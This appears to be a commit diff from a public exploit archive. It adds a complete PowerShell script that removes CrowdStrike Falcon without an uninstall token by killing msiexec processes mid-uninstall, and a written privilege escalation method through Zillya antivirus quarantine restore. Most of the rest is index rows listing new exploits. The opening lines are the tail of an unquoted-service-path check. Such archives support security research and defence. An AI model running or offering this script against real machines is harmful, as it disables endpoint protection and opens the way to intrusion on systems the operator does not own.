DCIService C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe Auto
C:\Users\p4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: DCIService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DCIService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

46
exploits/windows/local/51146.ps1 Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; Modified by Deda Cloud Purple Team members, to exploit hotfixed release. Pubblication of of CVE-2022-44721 in progress.
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"
foreach($obj in $InstalledSoftware){
if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
{
$uninstall_uuid = $obj.Name.Split("\")[6]
}
}
$g_msiexec_instances = New-Object System.Collections.ArrayList
Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"
while($true)
{
if (get-process -Name "CSFalconService") {
Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
if (-Not $g_msiexec_instances.contains($_.id)){
$g_msiexec_instances.Add($_.id)
if (4 -eq $g_msiexec_instances.count -or 5 -eq $g_msiexec_instances.count){
Start-Sleep -Milliseconds 100
Write-Host "[+] Killing PID " + $g_msiexec_instances[-1]
stop-process -Force -Id $g_msiexec_instances[-1]
}
}
}
} else {
Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
break
}
}

48
exploits/windows/local/51151.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
# Date: 02.12.2022
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://zillya.com/
# Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)
# Version: IS (3.0.2367.0) / TS (3.0.2368.0)
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/vRCZR1kd89Q
Vulnerabiliy Description:
---------------------------------------
Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want
to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often
found in antivirus programs.
You can read the article about AVGater vulnerabilities here:
https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.
Step by step produce:
---------------------------------------
1 - Attackers create new folder and into malicious file. It can be a DLL or any file.
2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him.
3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that
the current user does not have write permission to.
You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools
4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location.
This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require
authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges.
Advisories:
---------------------------------------
Developers should not allow unauthorized users to restore from quarantine unless necessary.
Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users
should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should
be run with normal privileges.
Disclosure Timeline:
---------------------------------------
13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released.
02.12.2022 - Full disclosure.

20
files_exploits.csv
View file

@ -2511,6 +2511,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24703,exploits/cgi/webapps/24703.txt,"LinuxStat 2.x - Directory Traversal",2004-10-25,anonymous,webapps,cgi,,2004-10-25,2013-03-10,1,CVE-2004-2640;OSVDB-11103,,,,,https://www.securityfocus.com/bid/11517/info
187,exploits/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,webapps,cgi,,2000-11-16,,1,OSVDB-60868,,,,,
37638,exploits/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",webapps,cgi,,2012-08-17,2015-07-18,1,,,,,,https://www.securityfocus.com/bid/55082/info
51149,exploits/cgi/webapps/51149.txt,"LISTSERV 17 - Insecure Direct Object Reference (IDOR)",2023-03-30,"Shaunt Der-Grigorian",webapps,cgi,,2023-03-30,2023-03-30,0,CVE-2022-40319,,,,,
51148,exploits/cgi/webapps/51148.txt,"LISTSERV 17 - Reflected Cross Site Scripting (XSS)",2023-03-30,"Shaunt Der-Grigorian",webapps,cgi,,2023-03-30,2023-03-30,0,CVE-2022-39195,,,,,
26917,exploits/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",webapps,cgi,,2005-12-20,2013-07-18,1,CVE-2005-4454;OSVDB-21896,,,,,https://www.securityfocus.com/bid/15990/info
21802,exploits/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",webapps,cgi,,2002-09-17,2012-10-08,1,CVE-2002-1493;OSVDB-9214,,,,,https://www.securityfocus.com/bid/5728/info
18841,exploits/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",webapps,cgi,,2012-05-07,2012-05-07,0,OSVDB-81822;OSVDB-81821;OSVDB-81820,,,,,
@ -3145,6 +3147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23672,exploits/hardware/dos/23672.txt,"Red-M Red-Alert 3.1 - Remote Denial of Service",2004-02-09,"Bruno Morisson",dos,hardware,,2004-02-09,2012-12-25,1,CVE-2004-2078;OSVDB-3891,,,,,https://www.securityfocus.com/bid/9618/info
688,exploits/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,dos,hardware,,2004-12-14,,1,OSVDB-12478,,,,,
24839,exploits/hardware/dos/24839.c,"Ricoh Aficio 450/455 PCL Printer - Remote ICMP Denial of Service",2004-12-14,"Hongzhen Zhou",dos,hardware,,2004-12-14,2013-03-18,1,,,,,,https://www.securityfocus.com/bid/11932/info
51137,exploits/hardware/dos/51137.py,"Router ZTE-H108NS - Stack Buffer Overflow (DoS)",2023-03-30,"George Tsimpidas",dos,hardware,,2023-03-30,2023-03-30,0,,,,,,
36309,exploits/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",dos,hardware,,2015-03-12,2015-03-12,0,OSVDB-119602,,,,,
34172,exploits/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial of Service",2014-07-27,Z3ro0ne,dos,hardware,,2014-07-27,2014-08-06,0,OSVDB-109608,,,,,
11633,exploits/hardware/dos/11633.pl,"Sagem Routers - Remote Reset",2010-03-04,AlpHaNiX,dos,hardware,,2010-03-03,,0,,,,,,
@ -3805,6 +3808,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
51138,exploits/hardware/remote/51138.txt,"Router ZTE-H108NS - Authentication Bypass",2023-03-30,"George Tsimpidas",remote,hardware,,2023-03-30,2023-03-30,0,,,,,,
18779,exploits/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,remote,hardware,,2012-04-24,2012-04-24,0,CVE-2012-2441;OSVDB-81406;CVE-2012-1803,,,,,
50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",2022-05-11,"Minh Khoa",remote,hardware,,2022-05-11,2022-05-11,0,CVE-2021-43164,,,,,
35800,exploits/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",remote,hardware,,2011-05-25,2015-01-16,1,,,,,,https://www.securityfocus.com/bid/47976/info
@ -8749,6 +8753,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34086,exploits/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",webapps,linux,443,2014-07-16,2014-07-16,0,OSVDB-109194;OSVDB-109193;OSVDB-109192;OSVDB-109191;CVE-2014-5350,,,,,
42290,exploits/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",webapps,linux,,2017-07-03,2017-07-03,0,CVE-2017-9833,,,,,
36689,exploits/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,webapps,linux,,2015-04-09,2015-04-09,0,CVE-2000-0920,,,,,http://www.s21sec.com/en/avisos/
51139,exploits/linux/webapps/51139.txt,"Boa Web Server v0.94.14 - Authentication Bypass",2023-03-30,"George Tsimpidas",webapps,linux,,2023-03-30,2023-03-30,0,,,,,,
34672,exploits/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",webapps,linux,8090,2014-09-15,2014-09-15,0,CVE-2014-4865;OSVDB-111270,,,,,
49362,exploits/linux/webapps/49362.py,"Cassandra Web 0.5.0 - Remote File Read",2021-01-05,"Jeremy Brown",webapps,linux,,2021-01-05,2021-01-05,0,,,,,,
47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,,2019-07-16,2019-07-16,0,CVE-2019-13605;CVE-2019-13360,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
@ -11566,6 +11571,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9916,exploits/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,webapps,multiple,,2009-02-24,,1,OSVDB-54551,"Metasploit Framework (MSF)",,,,
46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,,2019-05-10,2019-05-13,1,CVE-2019-7652,"Server-Side Request Forgery (SSRF)",,,,
49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,,2021-03-31,2021-03-31,0,,,,,,
51141,exploits/multiple/webapps/51141.py,"Covenant v0.5 - Remote Code Execution (RCE)",2023-03-30,xThaz,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
9726,exploits/multiple/webapps/9726.py,"cP Creator 2.7.1 - SQL Injection",2009-09-21,"Sina Yazdanmehr",webapps,multiple,,2009-09-20,,1,OSVDB-58259;CVE-2009-3330,,,,,
11211,exploits/multiple/webapps/11211.txt,"cPanel - HTTP Response Splitting",2010-01-21,Trancer,webapps,multiple,,2010-01-20,,1,OSVDB-61954,,cpanel_http_response_splitting_vulnerability.pdf,,,
11527,exploits/multiple/webapps/11527.html,"cPanel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-22,SecurityRules,webapps,multiple,,2010-02-21,,0,,,,,,
@ -11596,6 +11602,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39419,exploits/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery",2016-02-08,hyp3rlinx,webapps,multiple,,2016-02-08,2016-02-08,0,,,,,,http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
47449,exploits/multiple/webapps/47449.txt,"DotNetNuke 9.3.2 - Cross-Site Scripting",2019-10-01,"Semen Alexandrovich Lyhin",webapps,multiple,,2019-10-01,2020-06-18,0,,,,,,
47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80,2019-10-01,2019-10-01,0,CVE-2019-12562,"Cross-Site Scripting (XSS)",,,,
51134,exploits/multiple/webapps/51134.txt,"Dreamer CMS v4.0.0 - SQL Injection",2023-03-30,lvren,webapps,multiple,,2023-03-30,2023-03-30,0,CVE-2022-43128,,,,,
17606,exploits/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,webapps,multiple,,2011-08-04,2011-08-04,1,,,,,,
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple,,2021-04-23,2021-04-23,0,CVE-2021-3318,,,,,
12715,exploits/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,webapps,multiple,,2010-05-23,,1,OSVDB-65291;CVE-2010-2099;OSVDB-65243,,,,,
@ -11990,6 +11997,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50712,exploits/multiple/webapps/50712.rb,"Servisnet Tessa - Privilege Escalation (Metasploit)",2022-02-04,AkkuS,webapps,multiple,,2022-02-04,2022-02-08,0,CVE-2022-22833,,,,,
49133,exploits/multiple/webapps/49133.py,"Setelsa Conacwin 3.7.1.2 - Local File Inclusion",2020-12-01,"Bryan Rodriguez Martin",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
33717,exploits/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,webapps,multiple,,2010-03-05,2014-06-12,1,,,,,,https://www.securityfocus.com/bid/38575/info
@ -12070,6 +12078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-07-01,2021-07-01,0,,,,,,
11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80,2010-02-10,2010-11-12,1,OSVDB-62295;CVE-2010-0690,,,,,
38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple,,2015-11-16,2015-11-16,0,OSVDB-130352,,,,,
51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,,2021-07-06,2021-10-15,0,CVE-2021-42071,,,,,
48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,,2020-06-01,2020-06-01,0,CVE-2020-3952,,,,,
50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,,2021-06-24,2021-10-28,0,CVE-2021-21972,,,,,
@ -13026,6 +13035,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2487,exploits/php/webapps/2487.php,"4Images 1.7.x - 'search.php' SQL Injection",2006-10-08,Synsta,webapps,php,,2006-10-07,,1,OSVDB-29567;CVE-2006-5236,,,,,
50193,exploits/php/webapps/50193.txt,"4images 1.8 - 'limitnumber' SQL Injection (Authenticated)",2021-08-13,"Andrey Stoykov",webapps,php,,2021-08-13,2021-08-13,0,,,,,,
49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,,2021-06-03,2021-06-03,0,CVE-2021-27308,,,,http://www.exploit-db.com4images1.8.zip,
51147,exploits/php/webapps/51147.txt,"4images 1.9 - Remote Command Execution (RCE)",2023-03-30,"Andrey Stoykov",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
18592,exploits/php/webapps/18592.txt,"4Images Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",webapps,php,,2012-03-13,2012-03-13,0,OSVDB-80606,,,,,
49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,,2021-01-04,2021-01-04,0,,,,,,
18497,exploits/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",webapps,php,,2012-02-19,2012-02-19,0,OSVDB-80802,,,,,
@ -15522,6 +15532,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php,,2009-06-28,,1,OSVDB-55484;CVE-2009-2325,,,,,
12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@ -15903,6 +15914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15915,exploits/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - Cross-Site Scripting / Remote Code Execution",2011-01-05,mr_me,webapps,php,,2011-01-05,2011-01-07,1,,,,,http://www.exploit-db.comconcrete5.4.1.1.zip,
37225,exploits/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,webapps,php,,2012-05-20,2016-12-18,1,OSVDB-82440,,,,,https://www.securityfocus.com/bid/53640/info
49721,exploits/php/webapps/49721.txt,"Concrete5 8.5.4 - 'name' Stored XSS",2021-03-29,"Quadron Research Lab",webapps,php,,2021-03-29,2021-03-29,0,CVE-2021-3111,,,,,
51144,exploits/php/webapps/51144.txt,"Concrete5 CME v9.1.3 - Xpath injection",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
37103,exploits/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",webapps,php,,2012-04-26,2017-08-14,1,,,,,,https://www.securityfocus.com/bid/53268/info
26077,exploits/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,webapps,php,,2013-06-10,2013-06-10,0,OSVDB-94201;OSVDB-94200;OSVDB-94199,,,,http://www.exploit-db.comconcrete5.6.1.2.zip,
31735,exploits/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php?cID' SQL Injection",2014-02-18,killall-9,webapps,php,80,2014-02-18,2017-08-14,0,OSVDB-103570,,,,http://www.exploit-db.comconcrete5.6.2.1.zip,
@ -16580,6 +16592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7014,exploits/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,webapps,php,,2008-11-05,,1,OSVDB-49758;CVE-2008-5131;OSVDB-49757,,,,,
7016,exploits/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,webapps,php,,2008-11-05,,1,OSVDB-49807;CVE-2008-6348;OSVDB-49806;OSVDB-49805,,,,,
13827,exploits/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php,,2010-06-10,,1,,,,,,
51145,exploits/php/webapps/51145.py,"Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)",2023-03-30,"Eric Flokstra",webapps,php,,2023-03-30,2023-03-30,0,CVE-2022-24632;CVE-2022-24630;CVE-2022-24629;CVE-2022-24627,,,,,
4642,exploits/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,webapps,php,,2007-11-21,,1,OSVDB-38809;CVE-2007-6133,,,,,
31112,exploits/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-7036;OSVDB-44334,,,,,https://www.securityfocus.com/bid/27619/info
8545,exploits/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,webapps,php,,2009-04-26,,1,OSVDB-54422;CVE-2009-1624;OSVDB-54421;CVE-2009-1623,,,,,
@ -17388,6 +17401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41037,exploits/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php,,2017-01-12,2017-01-12,0,,,,,,
38965,exploits/php/webapps/38965.txt,"ECommerceMajor - 'productdtl.php?prodid' SQL Injection",2015-12-14,"Rahul Pratap Singh",webapps,php,80,2015-12-14,2017-10-18,1,OSVDB-131782,,,,http://www.exploit-db.comecommerceMajor-master.zip,
35878,exploits/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",webapps,php,,2015-01-26,2015-01-26,0,OSVDB-117570;OSVDB-117569;CVE-2015-1476,,,,,
51140,exploits/php/webapps/51140.txt,"Ecommerse v1.0 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
12713,exploits/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,webapps,php,,2010-05-22,,1,,,,,,
12702,exploits/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,webapps,php,,2010-05-21,,0,OSVDB-64854;CVE-2010-2042,,,,,
8548,exploits/php/webapps/8548.txt,"ECShop 2.5.0 - 'order_sn' SQL Injection",2009-04-27,Securitylab.ir,webapps,php,,2009-04-26,,1,OSVDB-54423;CVE-2009-1622,,,,,
@ -17753,6 +17767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33602,exploits/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,webapps,php,,2010-02-05,2014-06-01,1,CVE-2010-0614;OSVDB-62177,,,,,https://www.securityfocus.com/bid/38116/info
15169,exploits/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",webapps,php,,2010-10-01,2010-10-01,1,OSVDB-68345,,,http://www.exploit-db.com/screenshots/idlt15500/15169.png,http://www.exploit-db.comevaria_ecms_v.1.1.zip,
32057,exploits/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,webapps,php,,2008-07-16,2014-03-05,1,,,,,,https://www.securityfocus.com/bid/30262/info
51153,exploits/php/webapps/51153.txt,"Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)",2023-03-30,"@casp3r0x0 hassan ali al-khafaji",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
24748,exploits/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",webapps,php,,2004-11-16,2013-03-13,1,,,,,,https://www.securityfocus.com/bid/11693/info
46115,exploits/php/webapps/46115.txt,"Event Calendar 3.7.4 - 'id' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80,2019-01-10,2019-01-10,1,,"SQL Injection (SQLi)",,,,
43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-10,2017-12-13,0,CVE-2017-17616,,,,,
@ -23554,6 +23569,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22405,exploits/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,webapps,php,,2012-11-01,2012-11-01,0,OSVDB-86841,,,,http://www.exploit-db.comSuscriberUsers.zip,
17962,exploits/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,webapps,php,,2011-10-10,2011-10-13,1,CVE-2011-4569;OSVDB-77448,,,,,
35266,exploits/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",webapps,php,,2014-11-17,2014-11-22,1,,,,http://www.exploit-db.com/screenshots/idlt35500/screen-shot-2014-11-17-at-092854.png,,
51136,exploits/php/webapps/51136.txt,"myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
38508,exploits/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,webapps,php,,2013-05-07,2015-10-22,1,,,,,,https://www.securityfocus.com/bid/59690/info
49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php,,2021-01-29,2021-01-29,0,CVE-2021-3337,,,,,
23624,exploits/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,webapps,php,,2012-12-24,2012-12-26,1,OSVDB-88757,,,,http://www.exploit-db.comhmflags_1.1.zip,
@ -33450,6 +33466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
